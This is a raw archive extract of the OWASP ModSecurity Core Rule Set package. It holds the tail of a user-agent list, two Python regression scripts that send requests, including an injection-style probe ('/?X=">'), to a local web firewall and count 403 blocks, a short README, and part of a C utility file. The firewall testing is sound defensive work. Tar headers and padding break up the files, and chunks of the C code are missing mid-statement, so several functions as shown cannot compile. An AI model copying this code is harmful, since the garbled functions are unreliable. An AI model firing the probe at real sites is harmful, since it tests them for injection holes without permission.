(iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5 Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5 Mozilla/5.0 (iPad; U; CPU iPad OS 5_0_1 like Mac OS X; en-us) AppleWebKit/535.1+ (KHTML like Gecko) Version/7.2.0.0 Safari/6533.18.5 Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200 Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200 Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8F190 Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145 Mozilla/5.0 (iPod; U; CPU iPhone OS 6_1 like Mac OS X; en-HK) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IP Mobile Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 NetSurf/1.2 (NetBSD; amd64) Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0 Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0 Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1 Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1 Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0 NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0 NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1 Offline Explorer/2.5 Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30 Opera/7.50 (Windows ME; U) [en] Opera/7.50 (Windows XP; U) Opera/7.51 (Windows NT 5.1; U) [en] Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr) Opera/9.0 (Macintosh; PPC Mac OS X; U; en) Opera/9.20 (Macintosh; Intel Mac OS X; U; en) Opera/9.25 (Windows NT 6.0; U; en) Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en) Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0 Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0 Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1 Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1 Opera/9.80 (Android 4.0.4; Linux; Opera Mobi/ADR-1205181138; U; pl) Presto/2.10.254 Version/12.00 Opera/9.80 (Android; Opera Mini/7.5.33361/31.1543; U; en) Presto/2.8.119 Version/11.1010 Opera/9.80 (Android; Opera Mini/7.5.33361/31.1543; U; en) Presto/2.8.119 Version/11.1010 Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0 Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00 Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61 Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00 Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00 Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10 Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10 Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14 Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01 Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00 Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16 Opera/9.80 (X11; FreeBSD 8.1-RELEASE i386; Edition Next) Presto/2.12.388 Version/12.10 Opera/9.80 (X11; Linux i686) Presto/2.12.388 Version/12.16 Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10 Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00 P3P Validator POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1 POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1 Peach/1.01 (Ubuntu 8.04 LTS; U; en) Python-urllib/2.5 SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3 SAMSUNG-SGH-A867/A867UCHJ3 SHP/VPP/R5 NetFront/35 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0 SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) SEC-SGHE900/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr) SEC-SGHX210/1.0 UP.Link/6.3.1.13.0 SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 SearchExpress SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0 SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonT100/R101 SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0 SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonT68/R201A SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US] SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0 SonyEricssonZ800/R1Y Browser/SEMC-Browser/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 SuperBot/4.4.0.60 (Windows XP) UCWEB/8.8 (SymbianOS/9.2; U; en-US; NokiaE63) AppleWebKit/534.1 UCBrowser/8.8.0.245 Mobile UCWEB/8.8 (iPhone; CPU OS_6; en-US)AppleWebKit/534.1 U3/3.0.0 Mobile User agent: Mozilla/5.0 (Linux; Android 4.3; SPH-L710 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.99 Mobile Safari/537.36 Uzbl (Webkit 1.3) (Linux i686 [i686]) Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1 W3C_Validator/1.305.2.12 libwww-perl/5.64 W3C_Validator/1.654 WDG_Validator/1.6.2 Web Downloader/6.9 WebCopier v4.6 WebZIP/3.5 (http://www.spidersoft.com) Wget/1.9 cvs-stable (Red Hat modified) Wget/1.9.1 everyfeed-spider/2.0 (http://www.everyfeed.com) facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php) grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org) grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org) iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2) iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2) iTunes/9.0.2 (Windows; N) iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca) libwww-perl/5.820 msnbot-media/1.1 ( http://search.msn.com/msnbot.htm) msnbot/0.11 ( http://search.msn.com/msnbot.htm) msnbot/1.0 ( http://search.msn.com/msnbot.htm) msnbot/1.1 ( http://search.msn.com/msnbot.htm) nook browser/1.0 portalmmm/2.0 N410i(c20;TB) w3m/0.5.1 w3m/0.5.1 wii libnup/1.0 �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/utils/testSampling.py����������������������������������������0000664�0000000�0000000�00000002775�14461225151�0024400�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from ftw import ruleset, http, errors """ This script assumes that default blocking action is 403 and sampling is one. It will send a know bad request that is expected to be blocked. If sampling is on it will only block a certain percentage. We send 1000 requests to verify this. In order to do this we must also turn off IP Reputation blocking. SecAction "id:900005,phase:1,nolog,pass,ctl:ruleEngine=on,ctl:ruleRemoveById=910000" """ def send_requests(input_data,subiters,result,index): http_ua = http.HttpUA() for i in range(0,subiters): new_index = str(index)+str(i) http_ua.send_request(input_data) result[new_index] = http_ua.response_object.status def run_requests(iterations): """Post request with no content-type AND no content-length""" x = ruleset.Input(method="GET", protocol="http",port=80,uri='/?X=">',dest_addr="localhost",headers={"Host":"localhost","User-Agent":"ModSecurity CRS 3 test"}) import threading returns = {} threads = [] for i in range(5): t = threading.Thread(target=send_requests,args=(x,100, returns,i,)) threads.append(t) t.start() for t in threads: t.join() status_not_403 = 0 status_403 = 0 for status in returns.values(): if status == 403: status_403 += 1 else: status_not_403 += 1 x = (status_403/(len(returns)*1.0))*100 y = (status_not_403/(len(returns)*1.0))*100 print "403s =", x print "not 403s =", y return (x,y) def test_sampling(): print "running" block,passed = run_requests(100) assert block < 55 and block > 45 ���modsecurity-crs-3.3.5/tests/regression/utils/testUserAgents.py��������������������������������������0000664�0000000�0000000�00000002343�14461225151�0024675�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from ftw import ruleset, http, errors """ This script reads in a list of popular Useragents and checks to see if it triggers It expects 403's to be returned for a rule firing """ def read_useragents(filename): f = open(filename,'r') useragents = [agent.strip() for agent in f.readlines()] return useragents def run_requests(useragent_list): status_not_403 = 0 status_403 = 0 for useragent in useragent_list: # get me a counter while i'm waiting if (status_not_403 + status_403)%15 == 0: print("Send",status_not_403 + status_403, "Out of",len(useragent_list)) input_data = ruleset.Input(method="GET", protocol="http",port=80,uri='/',dest_addr="localhost",headers={"Host":"localhost","User-Agent":useragent}) http_ua = http.HttpUA() http_ua.send_request(input_data) status = http_ua.response_object.status if status == 403: status_403 += 1 else: status_not_403 += 1 x = (status_403/(len(useragent_list)*1.0))*100 y = (status_not_403/(len(useragent_list)*1.0))*100 print "403s =", x print "not 403s =", y def main(): uas = read_useragents('./data/popularUAs.data') run_requests(uas) main() ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/�������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0015634�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/README�������������������������������������������������������������������0000664�0000000�0000000�00000000364�14461225151�0016517�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������The util directory contains many supporting tools/scripts that may be used with the OWASP ModSecurity CRS files. Docker Support ============== A Dockerfile can be found in the docker/ directory, along with additional notes in docker/README.md ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/av-scanning/�������������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0020040�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/av-scanning/runAV/�������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0021073�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/av-scanning/runAV/common.c�����������������������������������������������0000775�0000000�0000000�00000043616�14461225151�0022544�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "common.h" int lock_file(char *filename) { int fd; if (!filename) return -1; if ((fd = open(filename,O_RDONLY | O_CREAT , S_IRWXU)) < 0) { print_error("lock_file","open",modsec_rpc_log_file,errno); return -1; } flock(fd,LOCK_EX); return fd; } int unlock_file(int fd) { flock(fd,LOCK_UN); return 0; } int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask) { char time_str[64], line[1024*1024]; time_t t; int fd; int i; switch (atoi(modsec_rpc_log_level)) { case DEBUG: time(&t); ctime_r(&t,time_str); time_str[strlen(time_str)-1] = '\0'; if ((fd = open(modsec_rpc_log_file,O_WRONLY | O_CREAT | O_APPEND | O_SYNC , S_IRWXU)) < 0) { print_error("print_request","open",modsec_rpc_log_file,errno); fd=2; } flock(fd,LOCK_EX); sprintf(line,"%s:REQUEST-BEGIN:======================================\n",time_str); line[1024*1024-1]='\0'; write(fd,line,strlen(line)); snprintf(line,1024*1024,"URL:%s\nCommand:%s\n",url,command); line[1024*1024-1]='\0'; write(fd,line,strlen(line)); for (i=0; i 0 && output) output[0]='\0'; if (!(fp=popen(command,"r"))) { print_error("run_cmd","popen",command,errno); return -1; } while (output_size && fgets(line,output_size>1024?1024:output_size,fp)) { strcat(output, line); output_size -= strlen(line); } if (!output_size) while (fgets(line,1024,fp)); pclose(fp); return 0; } int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters) { int i, idx=-1; for (i = 0; (i < max_parameters) && (idx < 0); i++) if ( strstr(parameters[i].name,parameter_name) ) idx=i; return idx; } int parse_file(char *filename, parameter_t *parameters, int max_parameters) { char line[1024], *ptr; int i; FILE *fp; if (!max_parameters || (parameters == NULL) || (filename == NULL)) { print_error("parse_file","invalid input parameters","none",0); return 0; } if ((fp = fopen(filename,"r")) == NULL ) { print_error("parse_file","fopen",filename,errno); return 0; } i=0; while ( i < max_parameters && fgets(line,1024,fp)) { if (ptr = strstr(line,"#")) *ptr='\0'; if (sscanf(line,"%[^=]=%s",parameters[i].name,parameters[i].value) != 2) continue; i++; } fclose(fp); return i; } int change_file(char *filename, parameter_t parameter) { char line[1024], *name, *value; int i, found=0; FILE *fp; if (filename == NULL) return 0; if ((fp = fopen(filename,"r+")) == NULL ) return 0; i=0; while ( fgets(line,1024,fp)) { sscanf(line,"%[^=]=%s",name,value); if (name && !strcmp(name,parameter.name)) { fprintf(fp,"%s=%s\n",name,parameter.value); found=1; continue; } else fprintf(fp,"%s",line); } fclose(fp); return found; } int copy_file(char *src_file, char *dst_file) { char line[1024]; FILE *sfp, *dfp; if (src_file == NULL || dst_file == NULL) return 0; if ((sfp = fopen(src_file,"r")) == NULL ) return 0; if ((dfp = fopen(dst_file,"w")) == NULL ) { fclose(sfp); return 0; } while ( fgets(line,1024,sfp)) fprintf(dfp,"%s",line); fclose(sfp); fclose(dfp); return 1; } int parse_query(char *query, parameter_t *parameters, int max_parameters) { char *ptr, *dst_ptr, num[3]; int i, len; if (!max_parameters || (parameters == NULL) || (query == NULL)) return 0; ptr=query; i=0; while ((i < max_parameters) && *ptr) { parameters[i].name[0] = '\0'; dst_ptr = parameters[i].name; len=0; while (*ptr && (*ptr != '=') && (len++ < MAX_NAME_LENGTH)) { if (*ptr == '%' && *(ptr+1) && *(ptr+2)) { num[0]=*(ptr+1); num[1]=*(ptr+2); num[2]='\0'; ptr += 3; *dst_ptr=(char)strtol(num,NULL,16); if (*dst_ptr) dst_ptr++; } else *dst_ptr++ = *ptr++; } if (len >= MAX_NAME_LENGTH) while (*ptr && (*ptr != '=')) *ptr++; if (*ptr) ptr++; *dst_ptr = '\0'; parameters[i].value[0] = '\0'; dst_ptr = parameters[i].value; len=0; while (*ptr && (*ptr != '&') && (len++ < MAX_VALUE_LENGTH)) { if (*ptr == '%' && *(ptr+1) && *(ptr+2)) { num[0]=*(ptr+1); num[1]=*(ptr+2); num[2]='\0'; ptr += 3; *dst_ptr=(char)strtol(num,NULL,16); if (*dst_ptr) dst_ptr++; } else *dst_ptr++ = *ptr++; } if (len >= MAX_VALUE_LENGTH) while (*ptr && (*ptr != '&')) *ptr++; if (*ptr) ptr++; *dst_ptr = '\0'; i++; } return i; } int parse_query_and_body (parameter_t *parameters, int max_parameters) { char *query, *content_length_env; int i, num_of_params, body_len, content_length; query = getenv("QUERY_STRING"); if (query && *query) return(parse_query(query,parameters,max_parameters)); else { content_length_env = getenv("CONTENT_LENGTH"); if (!content_length_env) return 0; if (! *content_length_env) return 0; content_length=atol(content_length_env); if (!(query=malloc(content_length+1))) return 0; i = 1; body_len=0; while ( (body_len < content_length) && (i>0) ) { i = read(0,query+body_len,(content_length-body_len)<1024?(content_length-body_len):1024); if (i > 0 ) body_len+=i; } query[body_len] = '\0'; num_of_params = parse_query(query,parameters,max_parameters); free(query); return num_of_params; } } int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]) { char name[MAX_NAME_LENGTH], value[MAX_VALUE_LENGTH]; int i, num_of_params=0; if (num_of_args > 0) for (i=0; i0) ) { i = read(sock,reply+reply_len,(max_reply_size-reply_len)<1024?(max_reply_size-reply_len):1024); if (i > 0 ) reply_len+=i; } reply[reply_len] = '\0'; shutdown(sock,SHUT_RDWR); close(sock); return reply_len; } int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips) { int i, idx=-1; for (i = 0; (i < num_of_ips) && (idx < 0); i++) if ( strstr(blocklist[i].ip,ip) ) idx=i; return idx; } int remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips) { int i, j, idx=-1; time_t t; time(&t); for (i = 0; i < num_of_ips; i++) if ( (ip && strstr(blocklist[i].ip,ip)) || (!ip && (t > blocklist[i].end)) ) { idx=i; for (j=i; j<(num_of_ips-1); j++) { strcpy(blocklist[j].ip,blocklist[j+1].ip); blocklist[j].start = blocklist[j+1].start; blocklist[j].duration = blocklist[j+1].duration; blocklist[j].end = blocklist[j+1].end; strcpy(blocklist[j].token,blocklist[j+1].token); } num_of_ips--; } return idx; } int read_conf_file (char *filename) { int idx, num_of_params; parameter_t parameters[MAX_PARAMS]; num_of_params=parse_file(filename,parameters,MAX_PARAMS); if ((idx = find_param_idx("MODSEC_CLI_HOME",parameters,num_of_params)) >= 0) strcpy(modsec_cli_home,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_HOME",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_home,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_LOG_FILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_log_file,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_log_level,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_SSL_LOCKFILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_ssl_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_SENSOR_LOCKFILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_sensor_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_REVERSEPROXY_LOCKFILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_reverseproxy_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_EXTERNALNIC_LOCKFILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_externalnic_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_MUI_LOCKFILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_mui_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_log_level,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_HOME",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_home,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_IP",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_ip,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_PORT",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_port,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_NETWORK_PREFIX",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_network_prefix,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_BIN",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_bin,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_CONF",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_conf,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_EXT_NIC",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_ext_nic,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_PID",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_pid,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_WHITELIST",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_whitelist,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_BLACKLIST",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_blacklist,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_TIMEOUT",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_timeout,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_EXCHANGE",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_exchange,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_EXT_IPS",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_ext_ips,parameters[idx].value); if ((idx = find_param_idx("MODSEC_MUI_UI_ADMIN",parameters,num_of_params)) >= 0) strcpy(modsec_mui_ui_admin,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_PASSWORD_FILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_password_file,parameters[idx].value); if ((idx = find_param_idx("MODSEC_MUI_UI_IPADDRESS",parameters,num_of_params)) >= 0) strcpy(modsec_mui_ui_ipaddress,parameters[idx].value); if ((idx = find_param_idx("MODSEC_MUI_UI_PORT",parameters,num_of_params)) >= 0) strcpy(modsec_mui_ui_port,parameters[idx].value); if ((idx = find_param_idx("SENSOR_ID",parameters,num_of_params)) >= 0) strcpy(sensor_id,parameters[idx].value); if ((idx = find_param_idx("SERIAL",parameters,num_of_params)) >= 0) strcpy(serial,parameters[idx].value); if ((idx = find_param_idx("VERSION_NUMBER",parameters,num_of_params)) >= 0) strcpy(version_number,parameters[idx].value); if ((idx = find_param_idx("RELEASE_DATE",parameters,num_of_params)) >= 0) strcpy(release_date,parameters[idx].value); if ((idx = find_param_idx("BRIDGE_MODE",parameters,num_of_params)) >= 0) strcpy(bridge_mode,parameters[idx].value); if ((idx = find_param_idx("DATA_DISK_SPACE",parameters,num_of_params)) >= 0) 